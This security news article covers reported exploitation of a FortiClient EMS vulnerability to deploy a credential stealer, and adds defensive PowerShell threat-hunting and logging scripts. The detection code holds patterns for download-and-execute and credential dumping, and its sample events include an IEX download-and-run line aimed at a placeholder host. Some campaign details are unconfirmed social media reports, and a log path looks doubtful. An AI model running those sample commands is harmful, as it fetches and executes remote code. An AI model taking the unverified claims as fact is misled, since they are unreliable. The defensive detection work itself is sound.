
The cybersecurity landscape is once again facing turbulence after threat actors reportedly began exploiting a newly identified vulnerability in Fortinet’s FortiClient EMS platform. According to reports circulating across the security community, attackers are abusing CVE-2026-35616 to deploy the EKZ credential stealer through manipulated VPN scripting workflows, unauthenticated API access, and malicious PowerShell execution.
The attack chain appears particularly dangerous because it targets endpoint environments that organizations trust for secure remote connectivity. FortiClient EMS, widely used for centralized endpoint management and VPN deployment, becomes a high-value target when misconfigured or left unpatched. Threat actors understand this perfectly, and the latest campaign demonstrates how quickly operational tools can be transformed into entry points for credential theft and lateral movement.
Security researchers monitoring the campaign claim the exploit enables attackers to bypass authentication mechanisms and execute malicious payloads remotely. Once access is achieved, the EKZ malware reportedly steals sensitive endpoint data, harvested credentials, and potentially VPN session details that can later be used for broader enterprise compromise.
The vulnerability is attracting attention because of the attack methodology itself. Instead of relying solely on phishing emails or traditional malware droppers, the attackers allegedly weaponize legitimate administrative workflows inside FortiClient EMS. This allows malicious PowerShell scripts to blend into normal operational traffic, making detection significantly harder for security teams.
Another alarming detail is the abuse of API functionality. APIs are often overlooked during security audits, yet they remain one of the fastest-growing attack surfaces in enterprise environments. If unauthenticated API access is indeed involved in this campaign, organizations running exposed EMS instances could unknowingly provide attackers with direct access into internal management infrastructure.
The EKZ credential stealer is reportedly designed to extract browser credentials, VPN-related authentication tokens, session cookies, and potentially stored enterprise secrets from infected systems. In modern cyberattacks, stolen credentials often become more valuable than ransomware deployment itself because they allow silent persistence inside corporate networks.
Analysts believe the campaign reflects a broader trend where attackers increasingly combine endpoint management exploitation with stealthy credential harvesting. Instead of immediately encrypting systems or causing visible disruption, threat actors now prioritize long-term access and data monetization.
Fortinet products have historically been attractive targets due to their widespread adoption across enterprise and government environments. Whenever a new Fortinet vulnerability emerges, cybercriminal groups rapidly scan the internet for exposed systems before organizations have time to patch.
The malicious PowerShell activity referenced in the reports further highlights the continued abuse of legitimate Windows administration tools. PowerShell remains one of the most commonly weaponized utilities in modern intrusions because it allows attackers to execute scripts directly in memory while avoiding traditional malware signatures.
If confirmed at scale, this attack could impact organizations that rely heavily on remote workforce connectivity. VPN infrastructure remains mission-critical for many businesses, and any compromise involving VPN management platforms can quickly evolve into a large-scale security incident.
Several cybersecurity observers have warned that the attack chain could enable credential replay attacks, privilege escalation, and deeper access into enterprise Active Directory environments. Once attackers gain administrative credentials, the damage potential increases dramatically.
Organizations using FortiClient EMS are advised to monitor logs carefully for suspicious API requests, unexpected PowerShell executions, unauthorized script deployments, and anomalous VPN management behavior. Endpoint detection tools should also be configured to flag unusual credential access patterns.
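The log review recommended above can be turned into a repeatable triage step. The following is an added example, not code from the article or from Fortinet: it scores PowerShell script block events (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) against the patterns the article mentions plus a few common download-and-execute markers. The pattern weights, the threshold, and the sample events are constructed assumptions to tune for your environment; the live query only returns data where Script Block Logging is already enabled.

```powershell
# Added example (not from the article): triage PowerShell script block events (ID 4104)
# by matching their script text against weighted regex families. Weights and the
# threshold are assumptions; adjust them after baselining normal automation.

$SuspiciousPatterns = @{
    'Invoke-Expression|\biex\b'                                    = 3
    'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest' = 2
    '-EncodedCommand|-enc\b|FromBase64String'                      = 3
    '-WindowStyle\s+Hidden|-NoProfile|-ExecutionPolicy\s+Bypass'   = 1
    'lsass|credential'                                             = 4
}

function Get-ScriptBlockScore {
    # Returns the summed weight of every pattern family found in the script text.
    param([Parameter(Mandatory)][string]$ScriptText)
    $score = 0
    $hits  = @()
    foreach ($entry in $SuspiciousPatterns.GetEnumerator()) {
        if ($ScriptText -match $entry.Key) {
            $score += $entry.Value
            $hits  += $entry.Key
        }
    }
    [pscustomobject]@{ Score = $score; Matches = $hits }
}

function Invoke-ScriptBlockTriage {
    # Emits one row per event whose score reaches the threshold.
    param(
        [Parameter(Mandatory)][object[]]$Events,   # objects with TimeCreated, ScriptText, Path
        [int]$Threshold = 3
    )
    foreach ($e in $Events) {
        $r = Get-ScriptBlockScore -ScriptText $e.ScriptText
        if ($r.Score -ge $Threshold) {
            [pscustomobject]@{
                TimeCreated = $e.TimeCreated
                Score       = $r.Score
                Matches     = ($r.Matches -join '; ')
                Path        = $e.Path
                Preview     = $e.ScriptText.Substring(0, [Math]::Min(120, $e.ScriptText.Length))
            }
        }
    }
}

function Get-ScriptBlockEvents {
    # Live query. In 4104 records the script text is property index 2 and the path index 4.
    param([int]$MaxEvents = 2000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                ScriptText  = $_.Properties[2].Value
                Path        = $_.Properties[4].Value
            }
        }
}

# Constructed sample events (not real telemetry) so the triage can be exercised offline.
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = Get-Date; Path = ''; ScriptText = 'Get-Service | Where-Object Status -eq Running' }
    [pscustomobject]@{ TimeCreated = Get-Date; Path = ''; ScriptText = 'IEX (New-Object Net.WebClient).DownloadString("http://placeholder.invalid/a.ps1")' }
    [pscustomobject]@{ TimeCreated = Get-Date; Path = 'C:\PLACEHOLDER\task.ps1'; ScriptText = 'powershell -NoProfile -WindowStyle Hidden -EncodedCommand AAAA' }
)

Invoke-ScriptBlockTriage -Events $SampleEvents | Format-Table -AutoSize
# Against live data: Invoke-ScriptBlockTriage -Events (Get-ScriptBlockEvents) | Format-Table -AutoSize
```

The first sample event scores 0 and is dropped; the second scores 5 (Invoke-Expression family plus download family) and the third scores 4 (encoded command plus hidden window), so both are reported. Scoring rather than single-pattern matching keeps legitimate scripts that merely use `-NoProfile` below the threshold.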
The incident also serves as another reminder that endpoint management systems require the same level of security scrutiny as internet-facing applications. Many organizations focus heavily on firewall protection while underestimating risks associated with centralized management platforms.
Threat intelligence discussions on social media indicate that exploitation activity may already be active in the wild, meaning organizations delaying updates could face elevated risk exposure in the coming days.
What Undercode Says:
The Real Problem Is Trust Abuse
The most dangerous aspect of this campaign is not the vulnerability itself. It is the abuse of trusted enterprise infrastructure. Attackers no longer need noisy malware binaries when they can hijack legitimate administrative frameworks already approved inside corporate networks.
Endpoint Management Is Becoming the New Battlefield
Over the past two years, cybercriminals have shifted focus toward management systems such as RMM tools, VPN controllers, patch management servers, and endpoint orchestration platforms. These systems already possess elevated privileges, making them ideal attack vectors.
PowerShell Continues to Dominate Modern Intrusions
PowerShell remains everywhere in enterprise environments because administrators depend on it daily. That same ubiquity makes it perfect for attackers. Security teams often struggle to distinguish legitimate automation from malicious execution chains.
APIs Are the Weakest Link in Many Enterprise Products
Many organizations secure login portals while ignoring backend APIs. Attackers understand that APIs frequently expose functionality developers never expected outsiders to access directly. Unauthenticated API flaws are especially catastrophic because they eliminate the need for credential theft during the initial intrusion stage.
Credential Theft Has Become More Valuable Than Ransomware
Years ago, attackers rushed to deploy ransomware immediately after gaining access. Today, stealth matters more. Stolen credentials can be sold, reused, or leveraged for persistent access over months without triggering major alarms.
Fortinet Remains a High-Value Target
Fortinet infrastructure exists in thousands of enterprise environments globally. Every critical Fortinet vulnerability quickly becomes attractive to both financially motivated gangs and advanced persistent threat groups.
Attackers Prefer Living-Off-the-Land Techniques
The reported abuse of scripting workflows aligns perfectly with the “living-off-the-land” strategy. Instead of introducing obvious malware files, attackers leverage native tools already trusted by the operating system.
VPN Ecosystems Are Under Continuous Pressure
Remote work permanently expanded the enterprise attack surface. VPN management systems became mission-critical overnight, but many organizations deployed them rapidly without fully hardening their environments.
Security Teams Must Watch Behavior, Not Just Malware
Traditional antivirus solutions alone cannot reliably detect attacks abusing legitimate tools. Behavioral monitoring, PowerShell logging, API inspection, and privilege anomaly detection are now essential defensive layers.
Deep analysis:

Detect suspicious PowerShell execution logs
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
    Where-Object { $_.Message -match "Invoke-Expression|DownloadString|EncodedCommand" }

Monitor suspicious FortiClient EMS processes
Get-Process | Where-Object { $_.ProcessName -match "Forti|EMS" }

Search for abnormal outbound connections
netstat -ano | findstr ESTABLISHED

Detect newly created admin accounts
# Enabled local accounts, then Security events for account creation (4720) and local group membership changes (4732)
Get-LocalUser | Where-Object { $_.Enabled -eq $true }
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732 } -ErrorAction SilentlyContinue

PowerShell logging enforcement
# The policy key does not exist by default; create it before setting the value
New-Item -Path HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Force | Out-Null
Set-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging `
    -Name EnableScriptBlockLogging -Value 1

Hunt for credential dumping activity
Get-WinEvent -LogName Security -MaxEvents 5000 |
    Where-Object { $_.Message -match "lsass|credential" }

Identify suspicious scheduled tasks
schtasks /query /fo LIST /v

Search EMS logs for unauthorized API requests
Select-String -Path "C:\Program Files\FortinetMS\logs.log" `
    -Pattern "api|unauthorized|403|401"

Detect encoded PowerShell commands
Get-CimInstance Win32_Process |
    Where-Object { $_.CommandLine -match "EncodedCommand" }

Network scanning indicators
Get-NetTCPConnection | Group-Object RemoteAddress

Why This Matters Beyond One Vulnerability
The broader issue extends beyond CVE-2026-35616 itself. Enterprise environments increasingly depend on centralized orchestration platforms. Once attackers compromise those systems, they gain the ability to distribute malicious payloads at scale across entire fleets of managed devices.
The Rise of Silent Intrusions
Cybercriminal operations are becoming quieter and more patient. Instead of triggering immediate disruption, they prioritize persistence, credential collection, and intelligence gathering before monetizing access later.
API Security Will Define Future Enterprise Defense
API security is no longer optional. Organizations must treat APIs as first-class attack surfaces requiring authentication, rate limiting, segmentation, and continuous monitoring.
Detection Engineering Must Evolve
Modern attacks bypass many signature-based tools entirely. Detection engineering teams now need to focus on behavioral telemetry, script execution analytics, abnormal parent-child process chains, and suspicious administrative actions.
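Abnormal parent-child process chains are the most concrete of the telemetry sources listed above. The following is an added example, not code from the article or from Fortinet: it evaluates process creation records (Security Event ID 4688) and flags a scripting host that is launched by an endpoint-management process or with evasion-style arguments. It assumes "Audit Process Creation" with command-line inclusion is enabled (otherwise the CommandLine field is empty), the property indexes follow the Windows 10 / Server 2016 and later event layout, and the parent name pattern reuses the article's own "Forti|EMS" check; the sample records and their paths are constructed placeholders.

```powershell
# Added example (not from the article): flag suspicious parent -> child chains in
# Security 4688 records. Rules and sample records are assumptions to tune per fleet.

$ChildOfInterest   = 'powershell\.exe$|pwsh\.exe$|cmd\.exe$|wscript\.exe$|mshta\.exe$'
$ManagementParents = 'Forti|EMS'   # same pattern the article's process check uses
$SuspiciousArgs    = '-EncodedCommand|-enc\b|-WindowStyle\s+Hidden|DownloadString|Invoke-Expression|\biex\b'

function Test-ProcessChain {
    # Record needs ParentProcessName, NewProcessName and CommandLine properties.
    param([Parameter(Mandatory)]$Record)
    $reasons = @()
    if ($Record.NewProcessName -match $ChildOfInterest) {
        if ($Record.ParentProcessName -match $ManagementParents) {
            $reasons += 'scripting host spawned by endpoint-management process'
        }
        if ($Record.CommandLine -match $SuspiciousArgs) {
            $reasons += 'command line carries evasion or download flags'
        }
    }
    [pscustomobject]@{
        Suspicious  = ($reasons.Count -gt 0)
        Reasons     = ($reasons -join '; ')
        Chain       = '{0} -> {1}' -f (Split-Path $Record.ParentProcessName -Leaf), (Split-Path $Record.NewProcessName -Leaf)
        CommandLine = $Record.CommandLine
    }
}

function Get-ProcessCreationRecords {
    # Live query. 4688 property indexes: 5 = NewProcessName, 8 = CommandLine, 13 = ParentProcessName.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                TimeCreated       = $_.TimeCreated
                NewProcessName    = $_.Properties[5].Value
                CommandLine       = $_.Properties[8].Value
                ParentProcessName = $_.Properties[13].Value
            }
        }
}

# Constructed sample records (placeholder paths, not real telemetry).
$Samples = @(
    [pscustomobject]@{ ParentProcessName = 'C:\Windows\explorer.exe'
                       NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine       = 'powershell.exe Get-Service' }
    [pscustomobject]@{ ParentProcessName = 'C:\Program Files\PLACEHOLDER\ems-agent-placeholder.exe'
                       NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine       = 'powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand AAAA' }
    [pscustomobject]@{ ParentProcessName = 'C:\Windows\System32\services.exe'
                       NewProcessName    = 'C:\Windows\System32\svchost.exe'
                       CommandLine       = 'svchost.exe -k netsvcs' }
)

$Samples | ForEach-Object { Test-ProcessChain -Record $_ } | Where-Object Suspicious | Format-List
# Against live data: Get-ProcessCreationRecords | ForEach-Object { Test-ProcessChain -Record $_ } | Where-Object Suspicious
```

Only the second sample is reported, with both reasons attached: an administrator opening PowerShell from Explorer and a service host started by services.exe are left alone. Keying on lineage plus arguments, rather than on the PowerShell binary alone, is what lets this rule survive in environments where administrators use PowerShell all day.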
Why Endpoint Visibility Matters
Organizations lacking endpoint visibility may never realize credentials were stolen until secondary attacks emerge weeks later. By then, attackers may already possess VPN access, email credentials, and privileged tokens.
Threat Actors Are Exploiting Operational Complexity
Large enterprises often run hybrid infrastructures with multiple authentication layers, VPN systems, and management consoles. Complexity itself becomes a vulnerability because defenders struggle to maintain consistent monitoring everywhere.
Security Hygiene Still Wins
Despite sophisticated exploitation chains, many breaches remain preventable through rapid patching, segmented management interfaces, restricted PowerShell execution, and zero-trust authentication policies.
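"Restricted PowerShell execution" is only auditable if the logging that backs it is in place everywhere. The following is an added example, not code from the article or from any vendor: it enables the three PowerShell audit channels (script block logging, module logging, transcription) through the documented policy registry keys and then reads them back as a compliance check. It must run elevated; the transcript output directory is an assumption, and in production it should be a write-only, ACL-protected location that endpoints cannot read or clear.

```powershell
# Added example (not from the article): enforce and verify PowerShell auditing policy.
# Keys under HKLM:\Software\Policies\Microsoft\Windows\PowerShell are the documented
# policy locations; the transcript directory below is an assumption.

$PolicyRoot = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell'

function Set-RegistryValue {
    # Creates the key when missing (Set-ItemProperty fails on a missing key), then writes the value.
    param([string]$Path, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

function Enable-PowerShellAuditing {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumption: use a protected collector path in production
    Set-RegistryValue "$PolicyRoot\ScriptBlockLogging"       'EnableScriptBlockLogging' 1
    Set-RegistryValue "$PolicyRoot\ModuleLogging"            'EnableModuleLogging'      1
    Set-RegistryValue "$PolicyRoot\ModuleLogging\ModuleNames" '*' '*' 'String'          # log every module
    Set-RegistryValue "$PolicyRoot\Transcription"            'EnableTranscripting'      1
    Set-RegistryValue "$PolicyRoot\Transcription"            'EnableInvocationHeader'   1
    Set-RegistryValue "$PolicyRoot\Transcription"            'OutputDirectory'          $TranscriptDir 'String'
}

function Test-PowerShellAuditing {
    # Reads each setting back and reports whether it matches the expected value.
    $checks = @(
        @{ Key = "$PolicyRoot\ScriptBlockLogging"; Name = 'EnableScriptBlockLogging'; Expected = 1 }
        @{ Key = "$PolicyRoot\ModuleLogging";      Name = 'EnableModuleLogging';      Expected = 1 }
        @{ Key = "$PolicyRoot\Transcription";      Name = 'EnableTranscripting';      Expected = 1 }
    )
    foreach ($c in $checks) {
        $actual = (Get-ItemProperty -Path $c.Key -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
        [pscustomobject]@{
            Setting   = $c.Name
            Expected  = $c.Expected
            Actual    = $actual
            Compliant = ($actual -eq $c.Expected)
        }
    }
}

Enable-PowerShellAuditing
Test-PowerShellAuditing | Format-Table -AutoSize
```

Run `Test-PowerShellAuditing` on its own from a scheduled job to catch hosts where the policy was never applied or was reverted; a host that reports Compliant = False for script block logging is also a host where the 4104-based hunts earlier in this article return nothing.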
🔍 Fact Checker Results
✅ FortiClient EMS has previously been targeted in real-world enterprise attacks due to its privileged role in network management.
✅ PowerShell abuse remains one of the most common techniques used in post-exploitation activity across Windows environments.
❌ There is currently limited publicly verified technical disclosure about the full scope of CVE-2026-35616 exploitation, meaning some circulating social media claims may still require independent confirmation.
📊 Prediction
🔮 Threat actors will increasingly target endpoint management ecosystems instead of traditional endpoints because centralized tools offer faster access to entire enterprise environments.
🔮 Security vendors will likely accelerate API hardening and privileged workflow protections following growing abuse of orchestration platforms.
🔮 Credential-stealing malware families like EKZ may evolve into modular espionage frameworks capable of persistence, lateral movement, and cloud authentication theft.
References:
Reported By: x.com